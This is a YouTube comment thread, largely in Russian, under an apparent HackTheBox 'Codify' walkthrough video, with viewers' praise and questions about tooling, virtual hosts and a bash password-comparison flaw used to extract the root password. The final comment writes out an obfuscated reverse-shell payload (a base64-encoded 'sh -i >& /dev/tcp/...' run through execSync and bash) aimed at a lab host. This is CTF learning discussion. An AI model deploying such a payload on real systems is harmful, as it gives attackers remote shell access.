Редко пишу комменты, но это супер крутой контент. У меня появилось новое хобби)) Большое спасибо за проделанную работу.
@naushnikol6 ай бұрын
Про бесплатные машины тоже расскажи. Контент супер!
@CamelCase-dg6xp11 ай бұрын
Привет!! Очень классный канал, подача контента, прошу не забрасывайте его))) Я двухлетний девопс (бубернетесы ваши, пайплайны, автоматизация и.т.д), но с большим интересом смотрю в сетевую безопасность, пентест и всякие другие возможности вскрывания жоп. С интересом буду наблюдать за каналом
@lilkirill44077 ай бұрын
ровно такая же история))
@evgeniyp19766 ай бұрын
посмотрев другие видео, имя пользователя joshua в хэше сразу смутило ) контент топ, случайно нашел, оооочень доступно объясняется. спасибо.
@romanryaboshtan927011 ай бұрын
замечательно, продолжай то, что ты делаешь!!!
@zhuk7 ай бұрын
просто кайф, больше таких видео!
@Super-fruja Жыл бұрын
классно 🎉
@yesipovdaniel494311 ай бұрын
Красавчик
@andrey690611 ай бұрын
Классный контент , продолжай в том же духе
@saber1in Жыл бұрын
Продолжай в том же духе, отличный контент!
@robotiksillya836311 ай бұрын
прикольно давай еще
@paulbond824411 ай бұрын
Шикарный контент!
@ИванМозгачев-ф4л7 ай бұрын
Скажите, а почему именно vim? почему нельзя использовать тотже nano? Или любые другие редакторы? Ну не прям "нельзя", а почему именно vim? Большая чать людей говорят - "Это олдсулько, профессионально и прочие симптомы" но никто не говорит почему все же vim. Есть ли у Вас свое мнение по этому вопросу?
@MrCyberSec7 ай бұрын
Почему нельзя? Можно. Дело вкуса и привычек. Используйте нано, если нравится, это асболютно ОК.
@rezo48463 ай бұрын
Вим предоставляет очень удобное управление командами и хоткеями. И если в них разобраться, то скорость работы очень увеличится
@TheArtemus Жыл бұрын
Не чего непонял, но залип
@okuzmenko11 ай бұрын
Классное видео. Можете пожалуйста подсказать что у вас за клавиатура и на каких свичах? Очень классно звучит 😍
@Andrew-v4o7k11 ай бұрын
плюсую, тоже заинтересовало)
@MrCyberSec11 ай бұрын
Спасибо! Клава: Keychron K8 Pro QMK Свичи: Gateron G Pro Brown
@okuzmenko11 ай бұрын
Большое спасибо!
@nuken-t5o25 күн бұрын
Спасибо за видео. Зачем в начале видео добавлять айпишник в хостс? Просто открыть страницу по айпишнику могло не сработать?
@MrCyberSec25 күн бұрын
Да, может не сработать, так как на HTB веб-сервисы часто настроены таким образом, что они работают только с определёнными доменными именами, связанными с виртуальными хостами. Если вы обращаетесь к такому сервису по IP или с неправильным именем хоста, он может не ответить
@nuken-t5o24 күн бұрын
@@MrCyberSec Понял, спасибо
@verchest354711 ай бұрын
Нужны ли углубленные знания по математике для инфо беза?
@MrCyberSec11 ай бұрын
Скажу так: если нет углубленных знаний в математике, то это ниразу не повод отказываться преследовать путь инфобеза. Тут скорее про логическое мышление, чем про математику. Логику же развивать можно. Программирование - отличный способ!
@MrRussianuser Жыл бұрын
А зачем вы делаете перебор пароля DB_PATH? Можно же просто написать sudo bash и делать что хотите (ну или sudo cat /root/.creds)
@MrCyberSec Жыл бұрын
Из под sudo можно запускать лишь скрипт бекапа, это видно из аутпута команды sudo -l
@dantesvss803611 ай бұрын
Что то на инопланетном языке.. наверное вы рассказывали, какой я тупой в .. хрен знает в чём))
@MrCyberSec11 ай бұрын
@kldev85666 ай бұрын
откуда такое условие что charset для пароля только латинские буквы и цифры? где спецсимволы?
@igorvlasiuk643210 ай бұрын
почему пароль от рута совпал с паролем от дб? ето и есть уязвимость?пароль один?
@MrCyberSec10 ай бұрын
Пароль от дб совпал с паролем от рута, но нам демонстрировали другое. Уязвимость в возможности эксфильтровать этот самый пароль из-за корявого условия проверки пользовательского пароля с паролем из файла /root/.creds
@igorvlasiuk643210 ай бұрын
@@MrCyberSec ето я понял в bash script нельзя проверку через == делать. Просто если б пароль дб не совпал с паролем рута нужно было б продолжать что-то другое.
@MrCyberSec10 ай бұрын
@@igorvlasiuk6432 Да, но в данном случае нам хотели продемонстрировать именно эту уязвимость и, так образом подведя к итогу машины. Есть машины сложнее уровнем и там так легко машины не заканчиваются:)
@kakarot2004-l211 ай бұрын
Can you provide penetrating test report for codify please 🙂
@MrCyberSec11 ай бұрын
Yes, my writeup is here: maddevs.io/writeups/hackthebox-codify/
@kakarot2004-l211 ай бұрын
@@MrCyberSec I opened brother , but it shows like An error occurred in the application and your page could not be served. If you are the application owner, check your logs for details.
@MrCyberSec11 ай бұрын
@@kakarot2004-l2 which country are you accessing it from? Might be your ISP blocking.. Try opening it with VPN. I recommend using CloudFlare WARP technology. It's free and secures your internet connection.
@kakarot2004-l211 ай бұрын
@@MrCyberSec india brother
@kakarot2004-l211 ай бұрын
@@MrCyberSec which server did i want to choose?
@olegovsyanikov96013 ай бұрын
кароч не было там папки .ssh (( создал сам записал ключ - не коннектит сделал шел с .execSync('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvNDQ0NCAwPiYx | base64 -d | bash'); где в хеше по сути sh -i >& /dev/tcp/10.10.14.20/4444 0>&1 зайти зашел и записал еще раз уже другой ключ но не коннектит ссх - с вербозом вот debug1: Authentications that can continue: publickey,password debug1: Next authentication method: password странно почему у вас была .ssh папка и по идее после изменения authorized_keys нужно делать ребут sshd разве нет?